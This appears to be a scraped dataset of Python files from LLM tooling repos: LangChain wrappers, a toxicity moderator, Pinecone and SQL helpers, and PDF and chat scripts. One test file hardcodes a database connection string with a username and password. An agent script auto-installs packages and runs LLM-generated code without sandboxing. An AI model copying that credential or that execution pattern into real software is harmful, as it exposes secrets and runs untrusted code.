model_id="amazon.titan-text-express-v1",
streaming=True
)
"""
@property
def _llm_type(self) -> str:
"""Return type of llm."""
return "amazon_bedrock"
class Config:
"""Configuration for this pydantic object."""
extra = Extra.forbid
def _stream(
self,
prompt: str,
stop: Optional[List[str]] = None,
run_manager: Optional[CallbackManagerForLLMRun] = None,
**kwargs: Any,
) -> Iterator[GenerationChunk]:
"""Call out to Bedrock service with streaming.
Args:
prompt (str): The prompt to pass into the model
stop (Optional[List[str]], optional): Stop sequences. These will
override any stop sequences in the `model_kwargs` attribute.
Defaults to None.
run_manager (Optional[CallbackManagerForLLMRun], optional): Callback
run managers used to process the output. Defaults to None.
Returns:
Iterator[GenerationChunk]: Generator that yields the streamed responses.
Yields:
Iterator[GenerationChunk]: Responses from the model.
"""
return self._prepare_input_and_invoke_stream(
prompt=prompt, stop=stop, run_manager=run_manager, **kwargs
)
def _call(
self,
prompt: str,
stop: Optional[List[str]] = None,
run_manager: Optional[CallbackManagerForLLMRun] = None,
**kwargs: Any,
) -> str:
"""Call out to Bedrock service model.
Args:
prompt: The prompt to pass into the model.
stop: Optional list of stop words to use when generating.
Returns:
The string generated by the model.
Example:
.. code-block:: python
response = llm("Tell me a joke.")
"""
if self.streaming:
completion = ""
for chunk in self._stream(
prompt=prompt, stop=stop, run_manager=run_manager, **kwargs
):
completion += chunk.text
return completion
return self._prepare_input_and_invoke(prompt=prompt, stop=stop, **kwargs)
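# Minimal usage sketch (not part of the original module). The profile name and
# model id below are assumptions; any model id returned by Bedrock's
# list-foundation-models API can be used.
#
#     llm = Bedrock(
#         credentials_profile_name="default",
#         model_id="anthropic.claude-v2",
#         model_kwargs={"temperature": 0.5, "max_tokens_to_sample": 300},
#     )
#     print(llm("Tell me a joke.", stop=["\n\nHuman:"]))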
| [
"\n\nAssistant:",
"\n\nHuman:"
] |
2024-01-10 | ashleyxuu/langchain | libs~experimental~langchain_experimental~comprehend_moderation~toxicity.py | import asyncio
import importlib
from typing import Any, List, Optional
from langchain_experimental.comprehend_moderation.base_moderation_exceptions import (
ModerationToxicityError,
)
class ComprehendToxicity:
def __init__(
self,
client: Any,
callback: Optional[Any] = None,
unique_id: Optional[str] = None,
chain_id: Optional[str] = None,
) -> None:
self.client = client
self.moderation_beacon = {
"moderation_chain_id": chain_id,
"moderation_type": "Toxicity",
"moderation_status": "LABELS_NOT_FOUND",
}
self.callback = callback
self.unique_id = unique_id
def _toxicity_init_validate(self, max_size: int) -> Any:
"""
Validate and initialize toxicity processing configuration.
Args:
max_size (int): Maximum sentence size defined in the
configuration object.
Raises:
Exception: If the maximum sentence size exceeds the 5KB limit.
Note:
This function ensures that the NLTK punkt tokenizer is downloaded
if not already present.
        Returns:
            The imported ``nltk`` module.
"""
if max_size > 1024 * 5:
raise Exception("The sentence length should not exceed 5KB.")
try:
nltk = importlib.import_module("nltk")
nltk.data.find("tokenizers/punkt")
return nltk
except ImportError:
raise ModuleNotFoundError(
"Could not import nltk python package. "
"Please install it with `pip install nltk`."
)
        except LookupError:
            nltk.download("punkt")
            return nltk
def _split_paragraph(
self, prompt_value: str, max_size: int = 1024 * 4
) -> List[List[str]]:
"""
Split a paragraph into chunks of sentences, respecting the maximum size limit.
Args:
            prompt_value (str): The input paragraph to be split into chunks.
            max_size (int, optional): The maximum size limit in bytes for
                each chunk. Defaults to 1024 * 4.
Returns:
List[List[str]]: A list of chunks, where each chunk is a list
of sentences.
Note:
This function validates the maximum sentence size based on service
limits using the 'toxicity_init_validate' function. It uses the NLTK
sentence tokenizer to split the paragraph into sentences.
Example:
paragraph = "This is a sample paragraph. It
contains multiple sentences. ..."
chunks = split_paragraph(paragraph, max_size=2048)
"""
# validate max. sentence size based on Service limits
nltk = self._toxicity_init_validate(max_size)
sentences = nltk.sent_tokenize(prompt_value)
chunks = list() # type: ignore
current_chunk = list() # type: ignore
current_size = 0
for sentence in sentences:
sentence_size = len(sentence.encode("utf-8"))
# If adding a new sentence exceeds max_size
# or current_chunk has 10 sentences, start a new chunk
if (current_size + sentence_size > max_size) or (len(current_chunk) >= 10):
if current_chunk: # Avoid appending empty chunks
chunks.append(current_chunk)
current_chunk = []
current_size = 0
current_chunk.append(sentence)
current_size += sentence_size
# Add any remaining sentences
if current_chunk:
chunks.append(current_chunk)
return chunks
def validate(self, prompt_value: str, config: Any = None) -> str:
"""
Check the toxicity of a given text prompt using AWS
Comprehend service and apply actions based on configuration.
Args:
prompt_value (str): The text content to be checked for toxicity.
config (Dict[str, Any]): Configuration for toxicity checks and actions.
Returns:
str: The original prompt_value if allowed or no toxicity found.
Raises:
ValueError: If the prompt contains toxic labels and cannot be
processed based on the configuration.
"""
chunks = self._split_paragraph(prompt_value=prompt_value)
for sentence_list in chunks:
segments = [{"Text": sentence} for sentence in sentence_list]
response = self.client.detect_toxic_content(
TextSegments=segments, LanguageCode="en"
)
if self.callback and self.callback.toxicity_callback:
self.moderation_beacon["moderation_input"] = segments # type: ignore
self.moderation_beacon["moderation_output"] = response
toxicity_found = False
threshold = config.get("threshold")
toxicity_labels = config.get("labels")
if not toxicity_labels:
for item in response["ResultList"]:
for label in item["Labels"]:
if label["Score"] >= threshold:
toxicity_found = True
break
else:
for item in response["ResultList"]:
for label in item["Labels"]:
if (
label["Name"] in toxicity_labels
and label["Score"] >= threshold
):
toxicity_found = True
break
if self.callback and self.callback.toxicity_callback:
if toxicity_found:
self.moderation_beacon["moderation_status"] = "LABELS_FOUND"
asyncio.create_task(
self.callback.on_after_toxicity(
self.moderation_beacon, self.unique_id
)
)
if toxicity_found:
raise ModerationToxicityError
return prompt_value
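# Minimal usage sketch (illustrative, not part of the original module). It
# assumes valid AWS credentials and a region where Comprehend's
# detect_toxic_content API is available; the threshold and labels are example values.
#
#     import boto3
#
#     comprehend = boto3.client("comprehend", region_name="us-east-1")
#     checker = ComprehendToxicity(client=comprehend, chain_id="example-chain")
#     safe_prompt = checker.validate(
#         "Some user supplied text...",
#         config={"threshold": 0.7, "labels": []},
#     )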
| [] |
2024-01-10 | ashleyxuu/langchain | libs~langchain~langchain~memory~readonly.py | from typing import Any, Dict, List
from langchain.schema import BaseMemory
class ReadOnlySharedMemory(BaseMemory):
"""A memory wrapper that is read-only and cannot be changed."""
memory: BaseMemory
@property
def memory_variables(self) -> List[str]:
"""Return memory variables."""
return self.memory.memory_variables
def load_memory_variables(self, inputs: Dict[str, Any]) -> Dict[str, str]:
"""Load memory variables from memory."""
return self.memory.load_memory_variables(inputs)
def save_context(self, inputs: Dict[str, Any], outputs: Dict[str, str]) -> None:
"""Nothing should be saved or changed"""
pass
def clear(self) -> None:
"""Nothing to clear, got a memory like a vault."""
pass
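# Illustrative sketch (not part of the original module): wrap an existing memory
# so a chain can read it without mutating it. ConversationBufferMemory is used
# here only as an example backing memory.
#
#     from langchain.memory import ConversationBufferMemory
#
#     shared_memory = ConversationBufferMemory()
#     readonly_memory = ReadOnlySharedMemory(memory=shared_memory)
#     # load_memory_variables({}) delegates to shared_memory, while
#     # save_context() and clear() are no-ops.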
| [] |
2024-01-10 | ashleyxuu/langchain | libs~langchain~langchain~llms~huggingface_endpoint.py | from typing import Any, Dict, List, Mapping, Optional
import requests
from langchain.callbacks.manager import CallbackManagerForLLMRun
from langchain.llms.base import LLM
from langchain.llms.utils import enforce_stop_tokens
from langchain.pydantic_v1 import Extra, root_validator
from langchain.utils import get_from_dict_or_env
VALID_TASKS = ("text2text-generation", "text-generation", "summarization")
class HuggingFaceEndpoint(LLM):
"""HuggingFace Endpoint models.
To use, you should have the ``huggingface_hub`` python package installed, and the
environment variable ``HUGGINGFACEHUB_API_TOKEN`` set with your API token, or pass
it as a named parameter to the constructor.
Only supports `text-generation` and `text2text-generation` for now.
Example:
.. code-block:: python
from langchain.llms import HuggingFaceEndpoint
endpoint_url = (
"https://abcdefghijklmnop.us-east-1.aws.endpoints.huggingface.cloud"
)
hf = HuggingFaceEndpoint(
endpoint_url=endpoint_url,
huggingfacehub_api_token="my-api-key"
)
"""
endpoint_url: str = ""
"""Endpoint URL to use."""
task: Optional[str] = None
"""Task to call the model with.
Should be a task that returns `generated_text` or `summary_text`."""
model_kwargs: Optional[dict] = None
"""Keyword arguments to pass to the model."""
huggingfacehub_api_token: Optional[str] = None
class Config:
"""Configuration for this pydantic object."""
extra = Extra.forbid
@root_validator()
def validate_environment(cls, values: Dict) -> Dict:
"""Validate that api key and python package exists in environment."""
huggingfacehub_api_token = get_from_dict_or_env(
values, "huggingfacehub_api_token", "HUGGINGFACEHUB_API_TOKEN"
)
try:
from huggingface_hub.hf_api import HfApi
try:
HfApi(
endpoint="https://huggingface.co", # Can be a Private Hub endpoint.
token=huggingfacehub_api_token,
).whoami()
except Exception as e:
raise ValueError(
"Could not authenticate with huggingface_hub. "
"Please check your API token."
) from e
except ImportError:
raise ValueError(
"Could not import huggingface_hub python package. "
"Please install it with `pip install huggingface_hub`."
)
values["huggingfacehub_api_token"] = huggingfacehub_api_token
return values
@property
def _identifying_params(self) -> Mapping[str, Any]:
"""Get the identifying parameters."""
_model_kwargs = self.model_kwargs or {}
return {
**{"endpoint_url": self.endpoint_url, "task": self.task},
**{"model_kwargs": _model_kwargs},
}
@property
def _llm_type(self) -> str:
"""Return type of llm."""
return "huggingface_endpoint"
def _call(
self,
prompt: str,
stop: Optional[List[str]] = None,
run_manager: Optional[CallbackManagerForLLMRun] = None,
**kwargs: Any,
) -> str:
"""Call out to HuggingFace Hub's inference endpoint.
Args:
prompt: The prompt to pass into the model.
stop: Optional list of stop words to use when generating.
Returns:
The string generated by the model.
Example:
.. code-block:: python
response = hf("Tell me a joke.")
"""
_model_kwargs = self.model_kwargs or {}
# payload samples
params = {**_model_kwargs, **kwargs}
parameter_payload = {"inputs": prompt, "parameters": params}
# HTTP headers for authorization
headers = {
"Authorization": f"Bearer {self.huggingfacehub_api_token}",
"Content-Type": "application/json",
}
# send request
try:
response = requests.post(
self.endpoint_url, headers=headers, json=parameter_payload
)
except requests.exceptions.RequestException as e: # This is the correct syntax
raise ValueError(f"Error raised by inference endpoint: {e}")
generated_text = response.json()
if "error" in generated_text:
raise ValueError(
f"Error raised by inference API: {generated_text['error']}"
)
if self.task == "text-generation":
text = generated_text[0]["generated_text"]
# Remove prompt if included in generated text.
if text.startswith(prompt):
text = text[len(prompt) :]
elif self.task == "text2text-generation":
text = generated_text[0]["generated_text"]
elif self.task == "summarization":
text = generated_text[0]["summary_text"]
else:
raise ValueError(
f"Got invalid task {self.task}, "
f"currently only {VALID_TASKS} are supported"
)
if stop is not None:
# This is a bit hacky, but I can't figure out a better way to enforce
# stop tokens when making calls to huggingface_hub.
text = enforce_stop_tokens(text, stop)
return text
| [] |
2024-01-10 | goML-offers/data_explanation | api~services~chat_bot.py | from pandas import DataFrame
import requests
from pandasai import PandasAI
from pandasai.llm.openai import OpenAI
import pandas as pd
import os
from dotenv import load_dotenv
# Load environment variables from .env file
load_dotenv()
OPEN_API_KEY = os.getenv('OPEN_API_KEY')
def analyze_dataframe(df: pd.DataFrame, question: str) -> str:
# Round floating-point columns to a reasonable number of decimal places (e.g., 6)
df = df.round(6)
# Convert all DataFrame columns to strings
df = df.astype(str)
# Create an instance of the OpenAI API
llm = OpenAI(api_token=os.getenv('OPEN_API_KEY'))
# Create an instance of PandasAI
    pandas_ai = PandasAI(llm, conversational=False)
# Ask a question about the DataFrame
response = pandas_ai(df, question+",strictly only give me answers in text form with precise stat values; type the precise response first, followed by an explanation that is clear to a layperson. The response must contain at least 50 words.")
return response | [] |
2024-01-10 | Tuminha/QueryPDF | improvedquery.py | import os
import argparse
from dotenv import load_dotenv
from langchain.embeddings.openai import OpenAIEmbeddings
from langchain.vectorstores import DeepLake
from langchain.chat_models import ChatOpenAI
from langchain.chains import RetrievalQA
# Parse command-line arguments
parser = argparse.ArgumentParser(description="Run a query on the Vector Store.")
parser.add_argument("query", help="The query to run.")
args = parser.parse_args()
# Load environmental variables
load_dotenv()
# Set OpenAI and ActiveLoop API keys
os.environ['OPENAI_API_KEY'] = os.getenv('OPENAI_API_KEY')
os.environ['ACTIVELOOP_TOKEN'] = os.getenv('ACTIVELOOP_TOKEN')
# Specify the model to use
EMBEDDING_MODEL = os.getenv('EMBEDDINGS_MODEL')
ACTIVELOOP_DATASET_PATH = os.getenv('DATASET_PATH')
QA_PROMPT = "As a digital assistant with access to a vast database of dental knowledge, I'm asked: {question}"
CONDENSE_PROMPT = "I have found a variety of resources. Can you summarize the key points about: {documents}"
# Initialize OpenAI embeddings
embeddings = OpenAIEmbeddings(model=EMBEDDING_MODEL, disallowed_special=())
# Load DeepLake Vector Store
db = DeepLake(dataset_path=ACTIVELOOP_DATASET_PATH, read_only=True, embedding_function=embeddings)
# Create retriever object and specify search parameters
retriever = db.as_retriever()
retriever.search_kwargs['distance_metric'] = 'cos'
retriever.search_kwargs['k'] = 3
# Create a LangChain model for QA
model = ChatOpenAI(
model='gpt-3.5-turbo',
temperature=0.4,
max_tokens=2500
)
qa = RetrievalQA.from_llm(
model,
retriever=retriever,
qa_template=QA_PROMPT,
question_generator_template=CONDENSE_PROMPT,
return_source_documents=True
)
# Perform a query
response = qa.run(args.query)
print(response)
| [
"As a digital assistant with access to a vast database of dental knowledge, I'm asked: {question}",
"I have found a variety of resources. Can you summarize the key points about: {documents}"
] |
2024-01-10 | Tuminha/QueryPDF | pdfload.py | import os
import glob
from dotenv import load_dotenv
from langchain.document_loaders import PyPDFLoader
from langchain.vectorstores import DeepLake
from langchain.embeddings.openai import OpenAIEmbeddings
from langchain.chat_models import ChatOpenAI
from langchain.chains import RetrievalQA
# Load variables from .env file
load_dotenv()
# Set the ACTIVELOOP_TOKEN, OPENAI_API_KEY, EMBEDDINGS_MODEL, and DATASET_PATH environment variables
ACTIVELOOP_TOKEN = os.getenv('ACTIVELOOP_TOKEN')
EMBEDDINGS_MODEL = os.getenv('EMBEDDINGS_MODEL')
DATASET_PATH = os.getenv('DATASET_PATH')
OPENAI_API_KEY=os.getenv('OPENAI_API_KEY')
os.environ['ACTIVELOOP_TOKEN'] = ACTIVELOOP_TOKEN
os.environ['OPENAI_API_KEY'] = OPENAI_API_KEY
# Create the DeepLake Vector Store
embeddings = OpenAIEmbeddings(model=EMBEDDINGS_MODEL)
# Iterate over all PDF files in the specified directory
pdf_directory = 'docs'
pdf_files = glob.glob(pdf_directory + '/*.pdf')
for pdf_file in pdf_files:
# Load and split each PDF file
loader = PyPDFLoader(pdf_file)
pages = loader.load_and_split()
# Add the documents to the Vector Store
deeplake_db = DeepLake.from_documents(pages, embeddings, dataset_path=DATASET_PATH)
# Create a retriever
retriever = deeplake_db.as_retriever()
retriever.search_kwargs['distance_metric'] = 'cos'
retriever.search_kwargs['k'] = 2
# Create a RetrievalQA chain and run it
model = ChatOpenAI(model='gpt-3.5-turbo')
qa = RetrievalQA.from_llm(model, retriever=retriever)
# Run the question
response = qa.run('What is the platform switching?')
print(response)
| [] |
2024-01-10 | priyanshics20/test | playground~test_factcheck.py | import sys
import os
script_dir = os.path.dirname(os.path.abspath(__file__))
openagent_dir = os.path.abspath(os.path.join(script_dir, ".."))
sys.path.append(openagent_dir)
from openagent.llms._openai import OpenAI
from openagent.fact_check.factool import Factool
from dotenv import load_dotenv
load_dotenv()
# Initialize a Factool instance with the specified keys. foundation_model could be either "gpt-3.5-turbo" or "gpt-4"
factool_instance = Factool("gpt-4")
inputs = [
{
"prompt": "Introduce Graham Neubig",
"response": "Graham Neubig is a professor at MIT",
"category": "kbqa"
},
]
response_list = factool_instance.run(inputs)
print(response_list) | [] |
2024-01-10 | priyanshics20/test | openagent~helpers~bibtex.py | #Directly taken from Langchain Github Repo
"""Util that calls bibtexparser."""
import logging
from typing import Any, Dict, List, Mapping
from pydantic import BaseModel, Extra, root_validator
logger = logging.getLogger(__name__)
OPTIONAL_FIELDS = [
"annotate",
"booktitle",
"editor",
"howpublished",
"journal",
"keywords",
"note",
"organization",
"publisher",
"school",
"series",
"type",
"doi",
"issn",
"isbn",
]
class BibtexparserWrapper(BaseModel):
"""Wrapper around bibtexparser.
To use, you should have the ``bibtexparser`` python package installed.
https://bibtexparser.readthedocs.io/en/master/
This wrapper will use bibtexparser to load a collection of references from
a bibtex file and fetch document summaries.
"""
class Config:
"""Configuration for this pydantic object."""
extra = Extra.forbid
@root_validator()
def validate_environment(cls, values: Dict) -> Dict:
"""Validate that the python package exists in environment."""
try:
import bibtexparser # noqa
except ImportError:
raise ImportError(
"Could not import bibtexparser python package. "
"Please install it with `pip install bibtexparser`."
)
return values
def load_bibtex_entries(self, path: str) -> List[Dict[str, Any]]:
"""Load bibtex entries from the bibtex file at the given path."""
import bibtexparser
with open(path) as file:
entries = bibtexparser.load(file).entries
return entries
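    # Minimal usage sketch (illustrative; "references.bib" is a placeholder path
    # and requires the ``bibtexparser`` package):
    #
    #     wrapper = BibtexparserWrapper()
    #     entries = wrapper.load_bibtex_entries("references.bib")
    #     metadata = [wrapper.get_metadata(entry) for entry in entries]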
def get_metadata(
self, entry: Mapping[str, Any], load_extra: bool = False
) -> Dict[str, Any]:
"""Get metadata for the given entry."""
publication = entry.get("journal") or entry.get("booktitle")
if "url" in entry:
url = entry["url"]
elif "doi" in entry:
url = f'https://doi.org/{entry["doi"]}'
else:
url = None
meta = {
"id": entry.get("ID"),
"published_year": entry.get("year"),
"title": entry.get("title"),
"publication": publication,
"authors": entry.get("author"),
"abstract": entry.get("abstract"),
"url": url,
}
if load_extra:
for field in OPTIONAL_FIELDS:
meta[field] = entry.get(field)
return {k: v for k, v in meta.items() if v is not None} | [] |
2024-01-10 | priyanshics20/test | openagent~vectorstores~pinecone.py | """Wrapper around Pinecone vector database."""
from __future__ import annotations
import logging
import uuid
from typing import Any, Callable, Iterable, List, Optional, Tuple
from openagent.schema import Document
from openagent.vectorstores.embeddings.base import Embeddings
from openagent.vectorstores.base import VectorStore
logger = logging.getLogger(__name__)
class Pinecone(VectorStore):
"""Wrapper around Pinecone vector database.
To use, you should have the ``pinecone-client`` python package installed.
Example:
.. code-block:: python
from openagent.vectorstores import Pinecone
from openagent.embeddings.openai import OpenAIEmbeddings
import pinecone
# The environment should be the one specified next to the API key
# in your Pinecone console
pinecone.init(api_key="***", environment="...")
index = pinecone.Index("openagent-demo")
embeddings = OpenAIEmbeddings()
vectorstore = Pinecone(index, embeddings.embed_query, "text")
"""
def __init__(
self,
index: Any,
embedding_function: Embeddings,
text_key: str,
namespace: Optional[str] = None,
):
"""Initialize with Pinecone client."""
try:
import pinecone
except ImportError:
raise ValueError(
"Could not import pinecone python package. "
"Please install it with `pip install pinecone-client`."
)
if not isinstance(index, pinecone.index.Index):
raise ValueError(
f"client should be an instance of pinecone.index.Index, "
f"got {type(index)}"
)
self._index = index
self._embedding_function = embedding_function
self._text_key = text_key
self._namespace = namespace
def add_texts(
self,
texts: Iterable[str],
metadatas: Optional[List[dict]] = None,
ids: Optional[List[str]] = None,
namespace: Optional[str] = None,
batch_size: int = 32,
**kwargs: Any,
) -> List[str]:
"""Run more texts through the embeddings and add to the vectorstore.
Args:
texts: Iterable of strings to add to the vectorstore.
metadatas: Optional list of metadatas associated with the texts.
ids: Optional list of ids to associate with the texts.
namespace: Optional pinecone namespace to add the texts to.
Returns:
List of ids from adding the texts into the vectorstore.
"""
if namespace is None:
namespace = self._namespace
# Embed and create the documents
docs = []
ids = ids or [str(uuid.uuid4()) for _ in texts]
for i, text in enumerate(texts):
embedding = self._embedding_function(text)
metadata = metadatas[i] if metadatas else {}
metadata[self._text_key] = text
docs.append((ids[i], embedding, metadata))
# upsert to Pinecone
self._index.upsert(vectors=docs, namespace=namespace, batch_size=batch_size)
return ids
def similarity_search(
self,
        query: Optional[str] = None,
        embedding: Optional[List[float]] = None,
k: int = 4,
filter: Optional[dict] = None,
namespace: Optional[str] = None,
) -> List[Tuple[Document, float]]:
"""Return pinecone documents most similar to query, along with scores.
Args:
query: Text to look up documents similar to.
k: Number of Documents to return. Defaults to 4.
filter: Dictionary of argument(s) to filter on metadata
namespace: Namespace to search in. Default will search in '' namespace.
Returns:
List of Documents most similar to the query and score for each
"""
if (embedding is None and query is None) or (embedding is not None and query is not None):
raise ValueError("You must provide either query embeddings or query texts, but not both")
if namespace is None:
namespace = self._namespace
query_obj = self._embedding_function(query) if query is not None else embedding
docs = []
results = self._index.query(
[query_obj],
top_k=k,
include_metadata=True,
namespace=namespace,
filter=filter,
)
for res in results["matches"]:
metadata = res["metadata"]
if self._text_key in metadata:
text = metadata.pop(self._text_key)
score = res["score"]
docs.append((Document(page_content=text, metadata=metadata), score))
else:
logger.warning(
f"Found document with no `{self._text_key}` key. Skipping."
)
return docs
@classmethod
def from_texts(
cls,
texts: List[str],
embedding_function: Embeddings,
metadatas: Optional[List[dict]] = None,
ids: Optional[List[str]] = None,
batch_size: int = 32,
text_key: str = "text",
index_name: Optional[str] = None,
namespace: Optional[str] = None,
**kwargs: Any,
) -> Pinecone:
"""Construct Pinecone wrapper from raw documents.
This is a user friendly interface that:
1. Embeds documents.
2. Adds the documents to a provided Pinecone index
This is intended to be a quick way to get started.
Example:
.. code-block:: python
from langchain import Pinecone
from langchain.embeddings import OpenAIEmbeddings
import pinecone
# The environment should be the one specified next to the API key
# in your Pinecone console
pinecone.init(api_key="***", environment="...")
embeddings = OpenAIEmbeddings()
pinecone = Pinecone.from_texts(
texts,
embeddings,
index_name="langchain-demo"
)
"""
try:
import pinecone
except ImportError:
raise ValueError(
"Could not import pinecone python package. "
"Please install it with `pip install pinecone-client`."
)
indexes = pinecone.list_indexes() # checks if provided index exists
if index_name in indexes:
index = pinecone.Index(index_name)
elif len(indexes) == 0:
raise ValueError(
"No active indexes found in your Pinecone project, "
"are you sure you're using the right API key and environment?"
)
else:
raise ValueError(
f"Index '{index_name}' not found in your Pinecone project. "
f"Did you mean one of the following indexes: {', '.join(indexes)}"
)
for i in range(0, len(texts), batch_size):
# set end position of batch
i_end = min(i + batch_size, len(texts))
# get batch of texts and ids
lines_batch = texts[i:i_end]
# create ids if not provided
if ids:
ids_batch = ids[i:i_end]
else:
ids_batch = [str(uuid.uuid4()) for n in range(i, i_end)]
# create embeddings
embeds = embedding_function.embed_documents(lines_batch)
# prep metadata and upsert batch
if metadatas:
metadata = metadatas[i:i_end]
else:
metadata = [{} for _ in range(i, i_end)]
for j, line in enumerate(lines_batch):
metadata[j][text_key] = line
to_upsert = zip(ids_batch, embeds, metadata)
# upsert to Pinecone
index.upsert(vectors=list(to_upsert), namespace=namespace)
return cls(index, embedding_function.embed_query, text_key, namespace)
@classmethod
def from_existing_index(
cls,
index_name: str,
embedding: Embeddings,
text_key: str = "text",
namespace: Optional[str] = None,
) -> Pinecone:
"""Load pinecone vectorstore from index name."""
try:
import pinecone
except ImportError:
raise ValueError(
"Could not import pinecone python package. "
"Please install it with `pip install pinecone-client`."
)
return cls(
pinecone.Index(index_name), embedding.embed_query, text_key, namespace
)
def delete(self, ids: List[str]) -> None:
"""Delete by vector IDs.
Args:
ids: List of ids to delete.
"""
# This is the maximum number of IDs that can be deleted
chunk_size = 1000
for i in range(0, len(ids), chunk_size):
chunk = ids[i : i + chunk_size]
self._index.delete(ids=chunk)
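# Minimal usage sketch (illustrative only; the API key, environment and index
# name are placeholders). It connects to an existing index and runs a filtered
# similarity search.
#
#     import pinecone
#     from openagent.embeddings.openai import OpenAIEmbeddings
#
#     pinecone.init(api_key="...", environment="...")
#     store = Pinecone.from_existing_index("my-index", OpenAIEmbeddings())
#     docs_and_scores = store.similarity_search(
#         query="what is a vector database?", embedding=None, k=4, filter={"source": "docs"}
#     )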
| [] |
2024-01-10 | priyanshics20/test | playground~agentbox.py | import asyncio
asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy())
import sys
import os
script_dir = os.path.dirname(os.path.abspath(__file__))
openagent_dir = os.path.abspath(os.path.join(script_dir, ".."))
sys.path.append(openagent_dir)
import openagent
from openagent.llms._openai import OpenAI as guidance_llm
from openagent.agent.chat import ChatAgent
from dotenv import load_dotenv
load_dotenv()
from jupyter_client import KernelManager
from IPython import display
import subprocess
import ast
import argparse
import threading
def agent():
llm = guidance_llm(
model="gpt-3.5-turbo"
)
chat_template = '''
{{#user~}}
I want to translate the following English text into Python code:
QUERY: {{input}}
{{~/user}}
{{#assistant~}}
Sure, I can assist with that. If I need more information, I'll ask for clarification.
{{~/assistant}}
{{#user~}}
Yes, go ahead and write the complete code.
{{~/user}}
{{#assistant~}}
{{gen 'response' temperature=0 max_tokens=3900}}
{{~/assistant}}
{{#assistant~}}
If the context or the task is not clear, please provide additional information to clarify.
{{~/assistant}}'''
agent = ChatAgent(
llm=llm,
prompt_template=chat_template,
)
return agent
def install_dependencies(code):
try:
# Parse the code to extract import statements
parsed_ast = ast.parse(code)
imports = []
for node in ast.walk(parsed_ast):
if isinstance(node, ast.Import):
imports.extend([name.name for name in node.names])
elif isinstance(node, ast.ImportFrom):
module_name = node.module
if module_name is not None:
imports.append(module_name)
# Remove duplicate imports and filter out standard library modules
imports = list(set(imports))
# print("imports", imports)
resolved_imports = set()
for imp in imports:
if '.' in imp:
parent_module = imp.split('.')[0]
resolved_imports.add(parent_module)
else:
resolved_imports.add(imp)
# Remove duplicate imports and filter out standard library modules
resolved_imports = list(resolved_imports)
# print("resolved_imports", resolved_imports)
third_party_dependencies = [dep for dep in resolved_imports if dep not in sys.modules]
# print("third_party_dependencies", third_party_dependencies)
if third_party_dependencies:
subprocess.check_call([sys.executable, "-m", "pip", "install"] + third_party_dependencies)
return True
else:
# print("No third-party dependencies detected.")
return True
except subprocess.CalledProcessError:
print("Dependency installation failed.")
return False
def run_python_code_in_kernel(code):
# Create a kernel manager
km = KernelManager(kernel_name='python3') # Use the appropriate kernel name
# Start the kernel
km.start_kernel()
# Connect to the kernel
kc = km.client()
kc.start_channels()
# Execute the code in the kernel
kc.execute(code)
# Create a thread for waiting on messages
def wait_for_messages():
try:
while True:
msg = kc.get_iopub_msg()
msg_type = msg['header']['msg_type']
if msg_type == 'display_data':
output_data = msg['content']['data']
if 'image/png' in output_data:
display.display_png(output_data['image/png'], raw=True)
elif 'image/jpeg' in output_data:
                    display.display_jpeg(output_data['image/jpeg'], raw=True)
elif msg_type == 'stream':
output_data = msg['content']['text']
output_data = output_data.split("\n")
for output in output_data[:-1]:
display.display(output)
except asyncio.CancelledError:
pass # Ignore the exception
# Start the message-waiting thread
message_thread = threading.Thread(target=wait_for_messages)
message_thread.start()
# Wait for the specified timeout
timeout_seconds = 10
message_thread.join(timeout_seconds)
# Check if the thread is still alive (indicating timeout)
if message_thread.is_alive():
print("Code execution completed")
else:
print("Code execution completed within the timeout.")
# Stop the kernel
kc.stop_channels()
km.shutdown_kernel()
# Main function
def main(gpt_prompt):
res = agent().run(input=gpt_prompt)
code = f"""{res.split('```')[1].replace('python', '')}"""
print(code)
# Install dependencies
if install_dependencies(code):
# Run the generated code in the Jupyter kernel
run_python_code_in_kernel(code)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Execute Python code from the command line.')
parser.add_argument("--gpt_prompt", help="Python code to be executed", default=None)
args = parser.parse_args()
gpt_prompt = args.gpt_prompt
main(gpt_prompt)
| [
"\n {{#user~}}\n I want to translate the following English text into Python code:\n QUERY: {{input}}\n {{~/user}}\n\n {{#assistant~}}\n Sure, I can assist with that. If I need more information, I'll ask for clarification.\n {{~/assistant}}\n\n {{#user~}}\n Yes, go ahead and write the complete code.\n {{~/user}}\n\n {{#assistant~}}\n {{gen 'response' temperature=0 max_tokens=3900}}\n {{~/assistant}}\n\n {{#assistant~}}\n If the context or the task is not clear, please provide additional information to clarify.\n {{~/assistant}}"
] |
2024-01-10 | priyanshics20/test | playground~test_database_sql.py | import sys
import os
script_dir = os.path.dirname(os.path.abspath(__file__))
openagent_dir = os.path.abspath(os.path.join(script_dir, ".."))
sys.path.append(openagent_dir)
from openagent.tools.toolkits.SQL import SQLDatabaseToolkit
from openagent.helpers.sql_database import SQLDatabase
from openagent.llms._openai import OpenAI
llm=OpenAI(
model_name = "gpt-3.5-turbo",
openai_api_key=""
)
#Connect to database using connection string
db = SQLDatabase.from_uri("postgresql://zdacfiltaeqgfboocygtccgo%40psql-mock-database-cloud:mgsnfujnrvpcbvunovxzizhk@psql-mock-database-cloud.postgres.database.azure.com:5432/ecom1690210583529ypqrqrnjpngzufrw")
toolkit = SQLDatabaseToolkit(db=db, llm=llm)
tools = toolkit.get_tools()
print(tools[0]._run("select * from customers")) #QUERYSQLDataBase tool
print("----------------------------------------------------------------------------------------------------------------------------------")
print(tools[1]._run("customers, employees, offices")) #INFOSQLDataBase tool
print("----------------------------------------------------------------------------------------------------------------------------------")
print(tools[2]._run()) #LISTSQLDataBase tool
| [] |
2024-01-10 | priyanshics20/test | openagent~helpers~googlesearch.py | #Code directly taken from LangChain Github Repo
"""Util that calls Google Search."""
from typing import Any, Dict, List, Optional
from pydantic import BaseModel, Extra, root_validator
from openagent.utils import get_from_dict_or_env
class GoogleSearchAPIWrapper(BaseModel):
"""Wrapper for Google Search API.
    Setup instructions adapted from:
    https://stackoverflow.com/questions/37083058/programmatically-searching-google-in-python-using-custom-search
TODO: DOCS for using it
1. Install google-api-python-client
- If you don't already have a Google account, sign up.
- If you have never created a Google APIs Console project,
read the Managing Projects page and create a project in the Google API Console.
- Install the library using pip install google-api-python-client
The current version of the library is 2.70.0 at this time
2. To create an API key:
- Navigate to the APIs & Services→Credentials panel in Cloud Console.
- Select Create credentials, then select API key from the drop-down menu.
- The API key created dialog box displays your newly created key.
- You now have an API_KEY
3. Setup Custom Search Engine so you can search the entire web
- Create a custom search engine in this link.
- In Sites to search, add any valid URL (i.e. www.stackoverflow.com).
- That’s all you have to fill up, the rest doesn’t matter.
